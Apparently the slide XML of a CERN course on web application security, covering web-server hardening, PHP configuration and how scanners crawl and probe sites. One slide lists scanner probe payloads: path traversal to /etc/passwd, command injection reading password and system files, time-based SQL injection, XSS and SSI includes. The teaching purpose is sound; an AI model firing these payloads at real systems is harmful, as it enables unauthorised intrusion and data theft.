            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>password files (and other data files)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>htaccess</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> file (and other configuration files)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>bak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, .old, .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>~ etc. files with application source code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Forbid directory indexing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(listing)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1050" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>in Apache:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pP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 Options –Indexes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="165890" name="Picture 2" descr="C:\Sebastian\ComputerSecurity\my presentations\2009.04 - CERN course\materials\listing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86188" y="3848100"/>
            <a:ext cx="5267325" cy="18669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7" name="Multiply 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3571875" y="4514850"/>
            <a:ext cx="1414463" cy="1414463"/>
          </a:xfrm>
          <a:prstGeom prst="mathMultiply">
            <a:avLst>
              <a:gd name="adj1" fmla="val 9631"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF0000">
              <a:alpha val="53000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="FF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40165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8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Harden the Web server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9113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>
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>strip-down </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>the system configuration</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>only necessary packages, accounts, processes &amp; services </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>patch </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>OS, Web server, and Web applications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>use automatic patching if available</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>use a local </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>firewall</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>allow only what is expected (e.g. no outgoing connections)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>harden </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Web server configuration</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>incl. programming platform (J2EE, PHP etc.) configuration</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>run Web server as a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>regular (non-privileged) user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>use</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t> logs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>review regularly, store remotely</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="103428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929563" y="2000250"/>
            <a:ext cx="928687" cy="1273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7530464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3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3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3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3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3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1139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Programming in PHP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9216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sz="3600" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Read </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://phpsec.org/projects/guide/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Disable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>allow_url_fopen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>allow_url_include</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Disable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>register_globals</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>E_STRICT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> to find uninitialized variables</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Disable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>display_errors</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Don’t leave </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>phpinfo()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> files in the production version</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Google search: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>intitle:phpinfo filetype:php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="1" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="105476" name="Picture 6" descr="php-logo-large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89325" y="1068388"/>
            <a:ext cx="1223963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5238359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Web scanning tools – how they work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r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>1. Crawling			2. Scanning		3. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>R</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>eporting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="109571" name="Picture 3" descr="\\cern.ch\dfs\Users\s\slopiens\Documents\Computer Security\2009\2009-10 HEPiX\presentations\Web application security\materials\magnifying-glas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2654" y="3284984"/>
            <a:ext cx="2109788" cy="1582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9570" name="Picture 2" descr="\\cern.ch\dfs\Users\s\slopiens\Documents\Computer Security\2009\2009-10 HEPiX\presentations\Web application security\materials\searchology-web-graph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1039" y="3284984"/>
            <a:ext cx="2971800" cy="1687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9572" name="Picture 4" descr="\\cern.ch\dfs\Users\s\slopiens\Documents\Computer Security\2009\2009-10 HEPiX\presentations\Web application security\materials\report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6990" y="3284984"/>
            <a:ext cx="1695450" cy="2424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184336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Focus on Web applications – why?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7270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 smtClean="0"/>
              <a:t>Web applications are:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>often much more useful than desktop software =&gt; popular</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>often </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>publicly available</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>easy target </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>for attackers </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>finding vulnerable sites, automating and scaling attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>easy to develop</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>not so easy to develop well and securely</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>often </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vulnerable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>, thus making the server, the database, internal network, data etc. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>insecure</a:t>
            </a:r>
          </a:p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6862325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Web scanning - HTTP requests</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25603" name="Content Placeholder 8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GB" sz="1200" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>passwd</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" smtClean="0"/>
              <a:t>c:\\boot.ini</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" smtClean="0"/>
              <a:t>../../../../../../../../../../</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>passwd</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" smtClean="0"/>
              <a:t>../../../../../../../../../../boot.ini</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>a;env</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" smtClean="0"/>
              <a:t>a);</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>env</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" smtClean="0"/>
              <a:t>/e</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" smtClean="0"/>
              <a:t>¿'"(</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" smtClean="0"/>
              <a:t>sleep(4)#</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" smtClean="0"/>
              <a:t>1+and+sleep(4)#</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
              <a:t>')+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>and+sleep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
              <a:t>(4)='</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" smtClean="0"/>
              <a:t>"))+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>and+sleep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" smtClean="0"/>
              <a:t>(4)="</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
              <a:t>;waitfor+delay+'0:0:4'--</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" smtClean="0"/>
              <a:t>"));waitfor+delay+'0:0:4'--</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
              <a:t>benchmark(1000, MD5(1))#</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" smtClean="0"/>
              <a:t>1))+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>and+benchmark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" smtClean="0"/>
              <a:t>(10000000,MD5(1))#</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>pg_sleep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" smtClean="0"/>
              <a:t>(4)--</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" smtClean="0"/>
              <a:t>"))+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>and+pg_sleep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" smtClean="0"/>
              <a:t>(4)--</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1200" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25604" name="Content Placeholder 9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GB" sz="1200" dirty="0" smtClean="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>SCrIPT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" smtClean="0"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>fake_alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" smtClean="0"/>
              <a:t>("TbBPEYaN3gA72vQAlao1")&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>SCrIPT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" smtClean="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
              <a:t>|+ping+-c+4+localhost</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>run+ping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" smtClean="0"/>
              <a:t>+-n+3+localhost</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" smtClean="0"/>
              <a:t>&amp;&amp;+type+%SYSTEMROOT%\win.ini</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
              <a:t>;+type+%SYSTEMROOT%\win.ini</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" smtClean="0"/>
              <a:t>`/bin/cat+/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" smtClean="0"/>
              <a:t>`</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>run+type</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" smtClean="0"/>
              <a:t>+%SYSTEMROOT%\win.ini</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
              <a:t>b"+OR+"81"="81</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" smtClean="0"/>
              <a:t>http://w3af.sourceforge.net/w3af/remoteFileInclude.html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" smtClean="0"/>
              <a:t>../../../../../../../../../../../../../../../</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" smtClean="0"/>
              <a:t>/passwd%00.php</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" smtClean="0"/>
              <a:t>C:\boot.ini</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" smtClean="0"/>
              <a:t>%SYSTEMROOT%\win.ini</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" smtClean="0"/>
              <a:t>C:\boot.ini%00.php</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" smtClean="0"/>
              <a:t>%SYSTEMROOT%\win.ini%00.php</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" smtClean="0"/>
              <a:t>d'z"0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" smtClean="0"/>
              <a:t>&lt;!--#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>include+file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" smtClean="0"/>
              <a:t>="/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" smtClean="0"/>
              <a:t>"--&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" smtClean="0"/>
              <a:t>&lt;!--#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>include+file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" smtClean="0"/>
